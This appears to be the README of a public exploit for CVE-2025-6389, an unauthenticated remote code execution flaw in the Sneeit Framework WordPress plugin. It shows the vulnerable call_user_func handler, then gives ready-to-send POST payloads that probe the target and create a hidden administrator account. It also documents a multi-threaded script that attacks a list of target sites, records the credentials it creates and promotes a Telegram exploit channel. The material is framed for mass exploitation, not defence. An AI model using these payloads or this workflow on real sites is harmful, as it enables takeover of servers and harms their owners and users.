
Sneeit Framework <= 8.3 - Unauthenticated Remote Code Execution in sneeit_articles_pagination_callback
Sneeit Framework <= 8.3 - Unauthenticated Remote Code Execution in sneeit_articles_pagination_callback
_______ ________ ___ ___ ___ _____ __ ____ ___ ___
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| / /|___ \ / _ \ / _ \
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ / /_ __) | (_) | (_) |
| | \ \/ / | __|______/ /| | | |/ /|___ \______| '_ \|__ < > _ < \__, |
| |____ \ / | |____ / /_| |_| / /_ ___) | | (_) |__) | (_) | / /
\_____| \/ |______| |____|\___|/____|____/ \___/____/ \___/ /_/
📡 Don't miss the next drop. Follow @KNxploited on Telegram — the definitive channel for freshly disclosed CVEs, working exploits, and elite security research. First to know. First to act.
CVE-2025-6389 is a CVSS 9.8 Critical Remote Code Execution vulnerability found in the Sneeit Framework plugin for WordPress.
The flaw exists in the sneeit_articles_pagination_callback() function, which blindly passes user-supplied input into PHP's call_user_func() — an unauthenticated attacker can call any PHP function with arbitrary arguments, including wp_insert_user, effectively granting themselves full administrator access or executing any server-side code.
| Field | Details |
|---|---|
| CVE ID | CVE-2025-6389 |
| Plugin | Sneeit Framework (sneeit-framework) |
| Affected Versions | All versions up to and including 8.3 |
| Vulnerability Type | Remote Code Execution (RCE) |
| Attack Vector | Network — No Authentication Required |
| CVSS 3.1 Score | 9.8 CRITICAL |
| CVSS Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CNA | Wordfence |
| Impact | Full server compromise / Admin takeover |
| Researcher | Nxploited |
The root cause is misuse of PHP's call_user_func() in the plugin's AJAX handler:
// Registered without authentication check
add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback');
function sneeit_articles_pagination_callback() {
$callback = $_POST['callback']; // ← User-controlled function name
$args = json_decode(stripslashes($_POST['args']), true); // ← User-controlled args
// Calling ANY PHP function with ANY arguments — zero validation
$result = call_user_func($callback, ...$args);
echo $result;
die();
}
Why this is critical:
wp_ajax_nopriv_* = accessible by anyone, no login requiredcall_user_func($callback, $args) = arbitrary function invocationvar_dump, system, wp_insert_user, eval, or any PHP/WordPress functionStep 1 — Probe / Fingerprint
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
action = sneeit_articles_pagination
callback = var_dump
args = ["test"]
Expected Response → array(1) { [0]=> string(4) "test" }
↓
Confirms: call_user_func() is reachable and reflecting output
──────────────────────────────────────────────────────────────────
Step 2 — Admin Account Creation
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
action = sneeit_articles_pagination
callback = wp_insert_user
args = {"user_login":"Nxploited_XXXX",
"user_pass":"xplpass",
"user_email":"...",
"role":"administrator"}
Result → New administrator account silently created on target
↓
Full WordPress admin panel access achieved ✔️
pip install requests rich
| Dependency | Purpose |
|---|---|
requests | HTTP requests with session/proxy support |
rich | Live terminal dashboard, panels, progress |
threading | Concurrent multi-target processing |
queue | Thread-safe target distribution |
Python 3.8+ required. Type hints use
tuple[...]syntax introduced in 3.9+ — use 3.9+ for best compatibility.
CVE-2025-6389/
├── CVE-2025-6389.py # Main exploit script
├── list.txt # Target URLs — one per line
├── success_results.txt # Auto-generated: successful targets + credentials
└── debug_responses/ # Auto-generated: raw server responses for debugging
└── <target>.resp.txt
Create list.txt with one URL per line:
https://target1.com
https://target2.com
http://target3.com
URLs without
http://orhttps://are automatically prefixed withhttp://.
python CVE-2025-6389.py
You will be prompted:
Targets file name (default list.txt): list.txt
Number of threads (default 10): 20
The script launches a real-time Rich dashboard showing:
┌─────────────────────────────────────────────────────────────────────┐
│ [ASCII BANNER] │
├──────────────────────────────┬──────────────────────────────────────┤
│ Info │ Stats │
│ Usage: Put targets in... │ Total Targets: 150 │
│ Threads: 20 │ Processed: 87 │
│ Password: xplpass │ Successes: 12 │
│ Success Log: success... │ Failures: 75 │
│ Debug Dir: debug_responses │ Elapsed: 00:01:43 │
├──────────────────────────────┴──────────────────────────────────────┤
│ Recent Results │
│ Time Target Result │
│ 14:23:01 https://victim.com SUCCESS │
│ 14:23:03 https://example.net FAIL │
└─────────────────────────────────────────────────────────────────────┘
Successful exploits are saved to success_results.txt:
https://victim.com | USER: Nxploited_4821 | PASS: xplpass | EMAIL: [email protected]
Debug responses (for failed targets) are saved under debug_responses/:
debug_responses/
└── https___victim.com.resp.txt ← Raw server response for analysis